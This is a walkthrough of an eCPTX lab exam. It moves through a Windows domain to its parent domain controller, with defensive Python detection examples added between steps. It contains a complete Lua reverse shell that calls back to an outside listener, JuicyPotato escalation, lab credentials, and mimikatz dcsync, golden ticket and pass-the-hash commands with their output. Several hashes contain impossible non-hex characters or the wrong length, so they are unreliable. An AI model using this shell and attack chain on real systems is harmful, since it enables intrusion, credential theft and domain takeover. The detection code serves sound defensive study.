eCPTX


1. 10.100.11.101

1 – I opened https://172.16.80.100


2 – Added this code (a Lua reverse shell):

```lua
-- Connects back to the listener, runs each line it receives with io.popen
-- and returns the command output over the same socket.
local host, port = "175.12.80.12", 1111
local socket = require("socket")      -- LuaSocket
local tcp = socket.tcp()
local io = require("io")              -- the page had require("oi"), a typo
tcp:connect(host, port)
while true do
  local cmd, status, partial = tcp:receive()
  local f = io.popen(cmd, 'r')        -- 'r' so the output can be read; the page had 'w'
  local s = f:read("a")
  f:close()
  tcp:send(s)
  if status == "closed" then break end
end
tcp:close()
```

This gave me shell access.

Downloaded and executed my beacon.

Created a SOCKS proxy and used proxychains.

Found UAT Helpdesk App.url, which contained the following URL: http://uat-helpdesk.els-child.els.local/admin/default.aspx
2. 10.100.11.100

The server at http://10.100.11.100 includes an admin panel with admin:admin credentials.

From there I uploaded a shell.

Dumping the data gives user manager1 with password Compl3xP@ssword.

3. 10.100.11.150

Used manager1 to contact 10.100.11.150/admin/default.aspx

Used the “uatoperator” account against 10.100.11.150:

```
[11:16:47] root:examples git:(master) # proxychains mssqlclient.py uatoperator@10.100.11.150
ProxyChains-3.1 (http://proxychains.sf.net)
Impacket v0.9.17 - Copyright 2002-2018 Core Security Technologies
SQL> enable_xp_cmdshell
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
[*] INFO(UATSERVER\DB1): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL> xp_cmdshell whoami
output
--------------------------------------------------------------------------------
nt service\mssql$db1
NULL
SQL>
```

Document Classification: Confidential
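The INFO lines above are the server's own sp_configure messages, which SQL Server also writes to its ERRORLOG. The following is an added detection example, not part of the report and not Impacket code: it scans ERRORLOG lines for watched options being switched on. The option names are real sp_configure options; the ERRORLOG line layout (timestamp, spid, message) is an assumption, and the sample lines are constructed.

```python
"""Flag risky sp_configure changes in SQL Server ERRORLOG lines.

Added detection example (not from this report or from Impacket). The message
it keys on is the one mssqlclient.py echoed when enable_xp_cmdshell ran; the
surrounding ERRORLOG line layout (timestamp, spid) is an assumption.
"""
import re
from dataclasses import dataclass

# sp_configure options that turn the database engine into a command-execution host.
# The option names are real; which ones to watch is this example's choice.
WATCHED_OPTIONS = {
    "xp_cmdshell",
    "Ole Automation Procedures",
    "Ad Hoc Distributed Queries",
    "clr enabled",
}

# Assumed ERRORLOG layout: "<date> <time> spidNN  Configuration option '<name>' changed from X to Y. ..."
LINE_RE = re.compile(
    r"^(?P<ts>\d{4}-\d{2}-\d{2} \d{2}:\d{2}:\d{2}\.\d+)\s+(?P<spid>spid\d+)\s+"
    r"Configuration option '(?P<option>[^']+)' changed from (?P<old>\d+) to (?P<new>\d+)\."
)


@dataclass
class Finding:
    timestamp: str
    spid: str
    option: str
    old: int
    new: int

    @property
    def note(self) -> str:
        # "changed from 1 to 1" (as in the session above) means someone re-ran the
        # enable sequence on an option that was already on: still worth a look.
        if self.old == self.new:
            return "re-enabled (was already on)"
        return "enabled"


def scan_errorlog(lines):
    """Return a Finding for every watched option that ends up enabled."""
    findings = []
    for line in lines:
        m = LINE_RE.match(line.strip())
        if not m or m["option"] not in WATCHED_OPTIONS:
            continue
        old, new = int(m["old"]), int(m["new"])
        if new == 0:
            continue  # switching a watched option off is the desired state
        findings.append(Finding(m["ts"], m["spid"], m["option"], old, new))
    return findings


# Constructed sample excerpt (not real log data); the two 'changed from 1 to 1'
# lines mirror the INFO messages mssqlclient.py printed in the session above.
SAMPLE_ERRORLOG = """\
2019-10-29 11:16:40.11 Logon       Login succeeded for user 'uatoperator'. Connection made using SQL Server authentication.
2019-10-29 11:16:47.12 spid55      Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
2019-10-29 11:16:47.13 spid55      Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
2019-10-29 11:20:01.00 spid60      Configuration option 'xp_cmdshell' changed from 1 to 0. Run the RECONFIGURE statement to install.
2019-10-29 11:21:30.00 spid61      Configuration option 'Ole Automation Procedures' changed from 0 to 1. Run the RECONFIGURE statement to install.
"""

if __name__ == "__main__":
    for f in scan_errorlog(SAMPLE_ERRORLOG.splitlines()):
        print(f"{f.timestamp} {f.spid}: '{f.option}' {f.note}")
```

The spid in each finding can be joined to the ERRORLOG's login line for that session to recover the SQL login that made the change; here that would be the low-privileged uatoperator account, which is the reason such an account should not hold sysadmin on a UAT box.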

Executed commands.

Escalated with JuicyPotato:

```
JuicyPotato.exe -l 1111 -p c:\users\payload.exe -t * -c {8BA3F05E-D86B-21D0-A075-01C04FB68820}
```

Dumped passwords from the db.
4. 10.100.11.250

Used the admin credentials I got from the db to gain access to the jumpbox over wmic.

Impersonated uatoperator using make_token.

Then started a webserver on the win10-server machine to host my payloads, and started to execute commands on the jumpbox via invoke-command.

```
beacon> link JUMPBOX.ELS-CHILD.ELS.LOCAL
[*] Tasked to link to 'JUMPBOX.ELS-CHILD.ELS.LOCAL'
[+] host called home, sent: 56 bytes
[+] established link to child beacon: 10.100.10.250
```

After gaining shell access I tried to escalate my privileges and managed to do so by reading the unattended install file, which gave me administrator.
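The unattended-install file that gave up the administrator credential here is a Windows answer file (unattend.xml / sysprep.xml). What follows is an added check for that finding, not tooling from the report: it parses answer files with the standard library and classifies each stored password as clear text, base64-obfuscated (Windows appends "Password" or "AdministratorPassword" and base64-encodes the UTF-16LE string, which is encoding, not encryption), sysprep-cleaned, or empty, and walks a volume for the usual file names. The file-name list is an assumption and the sample XML is constructed.

```python
"""Audit Windows answer files (unattend.xml / sysprep.xml) for stored credentials.

Added example for this report, not the author's tooling. It classifies every
Password / AdministratorPassword value so an administrator can find files that
still carry a usable credential; no secret is printed.
"""
import base64
import os
import xml.etree.ElementTree as ET
from dataclasses import dataclass

NS = "{urn:schemas-microsoft-com:unattend}"   # namespace of Windows answer files
CLEANED = "*SENSITIVE*DATA*DELETED*"          # what sysprep writes when it scrubs a value
ANSWER_FILE_NAMES = {"unattend.xml", "unattended.xml", "autounattend.xml", "sysprep.xml"}  # assumed list
# Element -> suffix Windows appends before base64(UTF-16LE(...)) when PlainText is false.
SUFFIX = {"Password": "Password", "AdministratorPassword": "AdministratorPassword"}

@dataclass
class Finding:
    path: str    # dotted element path inside the answer file
    state: str   # plaintext | obfuscated | cleaned | empty | unknown

def _looks_obfuscated(value: str, suffix: str) -> bool:
    """True if value is base64 of UTF-16LE text ending in the expected suffix: encoded, not encrypted."""
    try:
        decoded = base64.b64decode(value, validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return False
    return decoded.endswith(suffix)

def _walk(elem, trail, out):
    # Collect (dotted path, element) for every credential element, in document order.
    name = elem.tag.replace(NS, "")
    trail = trail + [name]
    if name in SUFFIX:
        out.append((".".join(trail), elem))
    for child in elem:
        _walk(child, trail, out)

def classify_answer_file(xml_text: str):
    """Classify each credential element in one answer file given as text."""
    hits, findings = [], []
    _walk(ET.fromstring(xml_text), [], hits)
    for path, elem in hits:
        tag = path.rsplit(".", 1)[-1]
        value = (elem.findtext(NS + "Value") or "").strip()
        plain = elem.findtext(NS + "PlainText")
        if not value:
            state = "empty"
        elif value == CLEANED:
            state = "cleaned"
        elif plain is not None and plain.strip().lower() == "true":
            state = "plaintext"
        elif _looks_obfuscated(value, SUFFIX[tag]):
            state = "obfuscated"
        else:
            state = "plaintext" if plain is None else "unknown"
        findings.append(Finding(path, state))
    return findings

def needs_action(findings):
    """Paths whose value is still a usable credential (clear text or merely base64-obfuscated)."""
    return [f.path for f in findings if f.state in ("plaintext", "obfuscated")]

def audit_volume(root_dir):
    """Classify every answer file under a directory tree, e.g. a mounted Windows volume."""
    results = {}
    for dirpath, _dirs, files in os.walk(root_dir):
        for name in files:
            if name.lower() in ANSWER_FILE_NAMES:
                full = os.path.join(dirpath, name)
                with open(full, encoding="utf-8-sig") as fh:
                    results[full] = classify_answer_file(fh.read())
    return results

def _obfuscate(secret: str, suffix: str) -> str:
    """Encode a value the way Windows does for PlainText=false; used only to build the sample."""
    return base64.b64encode((secret + suffix).encode("utf-16-le")).decode("ascii")

# Constructed sample answer file (no real credentials): an obfuscated AutoLogon password,
# a sysprep-cleaned administrator password and a clear-text local account password.
SAMPLE_XML = """\
<unattend xmlns="urn:schemas-microsoft-com:unattend">
  <settings pass="oobeSystem"><component name="Microsoft-Windows-Shell-Setup">
    <AutoLogon>
      <Password><Value>%s</Value><PlainText>false</PlainText></Password>
      <Enabled>true</Enabled><Username>Administrator</Username>
    </AutoLogon>
    <UserAccounts>
      <AdministratorPassword><Value>%s</Value><PlainText>false</PlainText></AdministratorPassword>
      <LocalAccounts><LocalAccount>
        <Password><Value>Sample-Clear-1</Value><PlainText>true</PlainText></Password>
        <Name>svc_build</Name>
      </LocalAccount></LocalAccounts>
    </UserAccounts>
  </component></settings>
</unattend>
""" % (_obfuscate("Sample-Obf-1", "Password"), CLEANED)

if __name__ == "__main__":
    for f in classify_answer_file(SAMPLE_XML):
        print(f"{f.state:10s} {f.path}")
```

Anything reported by needs_action should be removed from the image or the file deleted after deployment; a value marked "obfuscated" is only a base64 encoding and offers no protection once the file is readable.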
5. 10.100.10.253

From the jumpbox (10.100.11.100) and using uatoperator I started to execute commands over wmi.

I started a webserver on the jumpbox to host the payloads.

I started to view the registry and found user administrator : B@dR3gistry

Used it to escalate and dump hashes:


```
beacon> dcsync els-child.els.local els-child\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els-child.els.local /user:els-child\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els-child.els.local' will be the domain
[DC] 'child-dc01.els-child.eLS.local' will be the DC server
[DC] 'els-child\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 11/3/2017 9:11:28 AM
Object Security ID   : S-1-5-21-235po937-599822933-351157107-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: e4ba51c7157fe411po603b661f1ccfbe
    ntlm- 0: e4ba51c7111fe46652603b661f1ccfbe
    lm  - 0: 1389eb4be52e304d1a753a704187dd66

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS-CHILD.ELS.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      aes128_hmac       (4096) : 6031a48480cc6db341758e230e6d
      des_cbc_md5       (4096) : 312a6bdfb09276c7

* Primary:Kerberos *
    Default Salt : ELS-CHILD.ELS.LOCALkrbtgt
    Credentials
      des_cbc_md5       : 312a6bd1j0276c7

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  1cf79ec9db39ca3ui8979d9cca4bdef2
    ..................................
    28  829bb53e575583c3io7f40aabf43f05
    29  0696af48622e71a7oi7cccc94c95d1b
```
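A dcsync like the one above is a directory replication request, so the domain controller's own Security log records it as event 4662 carrying the replication extended-rights GUIDs. The following is an added detection example, not from the report, Cobalt Strike or mimikatz: it flags any such request from an account that is neither a domain controller nor an allowlisted directory-sync account. The GUIDs are the real AD schema values; the event dicts use the 4662 field names, and the events and the allowlist are constructed. A confirmed hit on krbtgt means tickets can be minted offline, as the next section of the report shows, and only resetting the krbtgt password twice invalidates them.

```python
"""Detect DCSync-style replication requests in Windows Security event 4662.

Added detection example; not from this report, Cobalt Strike or mimikatz. It
assumes the events were already parsed into dicts keyed by the 4662 field names
(SubjectUserName, ObjectName, AccessMask, Properties). Sample events are constructed.
"""
from dataclasses import dataclass

# Extended rights a DCSync request needs (GUIDs are the real AD schema values).
REPLICATION_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # "Control Access" bit in the 4662 AccessMask


@dataclass
class Alert:
    account: str         # who asked for replication
    domain_dn: str       # ObjectName: the naming context that was read
    rights: tuple        # which replication rights were exercised


def is_expected_replicator(account: str, allowlist=frozenset()) -> bool:
    """Domain controllers (computer accounts, name ends in '$') and allowlisted
    directory-sync accounts replicate legitimately; anyone else is an alert."""
    return account.endswith("$") or account in allowlist


def detect_dcsync(events, allowlist=frozenset()):
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0x0"), 16) & CONTROL_ACCESS:
            continue
        props = ev.get("Properties", "").lower()
        rights = tuple(name for guid, name in REPLICATION_RIGHTS.items() if guid in props)
        if not rights:
            continue
        account = ev.get("SubjectUserName", "")
        if is_expected_replicator(account, allowlist):
            continue
        alerts.append(Alert(account, ev.get("ObjectName", ""), rights))
    return alerts


# Constructed sample events (not real log data). The second one is roughly what the
# beacon's dcsync of els-child\krbtgt above looks like from the DC's side.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "CHILD-DC01$", "ObjectName": "DC=els-child,DC=els,DC=local",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "sample-admin", "ObjectName": "DC=els-child,DC=els,DC=local",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2} {19195a5b-6da0-11d0-afd3-00c04fd930c9}"},
    {"EventID": 4662, "SubjectUserName": "MSOL_sample", "ObjectName": "DC=els-child,DC=els,DC=local",
     "AccessMask": "0x100",
     "Properties": "Control Access {1131f6aa-9c07-11d1-f79f-00c04fc2dcd2} {1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    # Control Access on a different right (not replication): ignored
    {"EventID": 4662, "SubjectUserName": "sample-admin", "ObjectName": "CN=Policies,CN=System,DC=els-child,DC=els,DC=local",
     "AccessMask": "0x100", "Properties": "Control Access {00299570-246d-11d0-a768-00aa006e0529}"},
    {"EventID": 4624, "SubjectUserName": "sample-admin", "LogonType": 3},
]

if __name__ == "__main__":
    for a in detect_dcsync(SAMPLE_EVENTS, allowlist={"MSOL_sample"}):
        print(f"{a.account} replicated {a.domain_dn}: {', '.join(a.rights)}")
```

The allowlist is where a directory-sync service account belongs; keep it short and reviewed, since any account on it is, by definition, allowed to pull every secret in the domain.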

6. 10.100.10.254

To gain access to the parent domain DC, I created a golden ticket for my user using the krbtgt hash I got before, adding him to the Enterprise Admins group:

```
beacon> mimikatz kerberos::golden /user:admin1 /krbtgt:1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-1-5-21-23589937-1851e4348-351157107 /sids:S-1-5-21-22511948-1856962338-1851e4348-519 /ticket:golden.ticket
[*] Tasked beacon to run mimikatz's kerberos::golden /user:admin1 /krbtgt: 1cf79ec9db39ca3ui8979d9cca4bdef2 /domain:els-child.els.local /sid:S-1-5-21-23511937-599888933-351157107 /sids:S-1-5-21-2128511948-1856962338-15222442862-519 /ticket:golden.ticket command
[+] host called home, sent: 998474 bytes
[+] received output:
User      : admin1
Domain    : els-child.els.local (ELS-CHILD)
SID       : S-1-5-21-23589937-1851e4348-351157107
User Id   : 500
Groups Id : *513 512 520 518 519
Extra SIDs: S-1-5-21-2128511948-1851e4348-1523442862-519 ;
ServiceKey: 1cf79ec9db39ca3ui8979d9cca4bdef2 - rc4_hmac_nt
Lifetime  : 10/29/2019 5:08:32 PM ; 10/26/2029 5:08:32 PM ; 10/26/2029 5:08:32 PM
-> Ticket : golden.ticket

 * PAC generated
 * PAC signed
 * EncTicketPart generated
 * EncTicketPart encrypted
 * KrbCred generated

Final Ticket Saved to file !
```

```
beacon> dcsync els.local els\krbtgt
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els.local /user:els\krbtgt command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\krbtgt' will be the user account

Object RDN           : krbtgt

** SAM ACCOUNT **

SAM Username         : krbtgt
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00000202 ( ACCOUNTDISABLE NORMAL_ACCOUNT )
Account expiration   :
Password last change : 9/7/2017 1:06:33 PM
Object Security ID   : S-1-5-21-2128511948-1856962338-1523442862-502
Object Relative ID   : 502

Credentials:
  Hash NTLM: d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
    ntlm- 0: f4f88438c968756e75252ca4056b0607
    lm  - 0: d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS.LOCALkrbtgt
    Default Iterations : 4096
    Credentials
      aes256_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      aes128_hmac       (4096) : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9
      des_cbc_md5       (4096) : 57fb67328f4651a7

* Primary:Kerberos *
    Default Salt : ELS.LOCALkrbtgt
    Credentials
      des_cbc_md5       : d8716ec186380fe09d1cdca13e0342314d1a121b22061db397dc77ddb0b17b9

* Packages *
    Kerberos-Newer-Keys

* Primary:WDigest *
    01  b4e712be7d587a19fe5b18b07a7ff799
    ...........................
    29  e1ac403d7b274c3d8c2e2c2d40ab7ccc
```

```
beacon> dcsync els.local els\administrator
[*] Tasked beacon to run mimikatz's @lsadump::dcsync /domain:els.local /user:els\administrator command
[+] host called home, sent: 746570 bytes
[+] received output:
[DC] 'els.local' will be the domain
[DC] 'lab-dc01.eLS.local' will be the DC server
[DC] 'els\administrator' will be the user account

Object RDN           : Administrator

** SAM ACCOUNT **

SAM Username         : Administrator
Account Type         : 30000000 ( USER_OBJECT )
User Account Control : 00010200 ( NORMAL_ACCOUNT DONT_EXPIRE_PASSWD )
Account expiration   :
Password last change : 10/30/2017 9:21:01 AM
Object Security ID   : S-1-5-21-2128511948-1856962338-1523442862-500
Object Relative ID   : 500

Credentials:
  Hash NTLM: 49623ccc820121223b3f0f571b77186
    ntlm- 0:
    ntlm- 1:
    lm  - 0:

Supplemental Credentials:
* Primary:Kerberos-Newer-Keys *
    Default Salt : ELS.LOCALAdministrator
    Default Iterations : 4096
    Credentials
```

Used the administrator hash to gain access to the parent domain’s DC:

```
beacon> pth els\administrator 49623ccc820121223b3f0f571b77186
[*] Tasked beacon to run mimikatz's sekurlsa::pth /user:administrator /domain:els /ntlm:49623ccc820121223b3f0f571b77186 /run:"%COMSPEC% /c echo 749c6eaf8a2 > \\.\pipe\56de86" command
[+] host called home, sent: 746598 bytes
[+] Impersonated NT AUTHORITY\SYSTEM
[+] received output:
user    : administrator
domain  : els
program : C:\Windows\system32\cmd.exe /c echo 749c6eaf8a2 > \\.\pipe\56de86
impers. : no
NTLM    : 49623ccc820121223b3f0f571b77186
  |  PID  2052
  |  TID  2676
  |  LSA Process is now R/W
  |  LUID 0 ; 1632426 (00000000:0018e8aa)
  \_ msv1_0   - data copy @ 0000004BBB9CA130 : OK !
  \_ kerberos - data copy @ 0000004BBB97F318
   \_ aes256_hmac       -> null
   \_ aes128_hmac       -> null
   \_ rc4_hmac_nt       OK
   \_ rc4_hmac_old      OK
   \_ rc4_md4           OK
   \_ rc4_hmac_nt_exp   OK
   \_ rc4_hmac_old_exp  OK
   \_ *Password replace @ 0000004BBB9745C8 (16) -> null
```

```
beacon> ls \\lab-dc01.els.local\c$
[*] Tasked beacon to list files in \\lab-dc01.els.local\c$
[+] host called home, sent: 41 bytes
[*] Listing: \\lab-dc01.els.local\c$\

 Size     Type     Last Modified         Name
 ----     ----     -------------         ----
          dir      03/18/2014 03:33:36   $Recycle.Bin
                                         bootmgr
                                         BOOTNXT
                                         milestone.txt
                                         pagefile.sys
```


```
beacon> wmi lab-dc01.els.local smb
[*] Tasked beacon to run windows/beacon_smb/bind_pipe (\\lab-dc01.els.local\pipe\status_6321) on lab-dc01.els.local via WMI
[+] host called home, sent: 208972 bytes
[-] Could not connect to pipe (\\lab-dc01.els.local\pipe\status_6321): 2
[+] established link to child beacon: 10.100.10.254
```

```
beacon> shell type milestone.txt
[*] Tasked beacon to run: type milestone.txt
[+] host called home, sent: 73 bytes
[*] started download of C:\milestone.txt (97 bytes)
[*] download of milestone.txt is complete
[+] received output:
It seems like i hacked the domain, by just compromising elearnsecurity’s moderator’s ass. How cool is that?

beacon> shell hostname
[*] Tasked beacon to run: hostname
[+] host called home, sent: 39 bytes
[+] received output:
lab-dc01

beacon> shell ipconfig
[*] Tasked beacon to run: ipconfig
[+] host called home, sent: 39 bytes
[+] received output:

Windows IP Configuration

Ethernet adapter Ethernet0:

   Connection-specific DNS Suffix  . :
   Link-local IPv6 Address . . . . . : fe80::5574:a356:2968:b78b%12
   IPv4 Address. . . . . . . . . . . : 10.100.10.254
   Subnet Mask . . . . . . . . . . . : 255.255.255.0
   Default Gateway . . . . . . . . . : 10.100.10.1
```
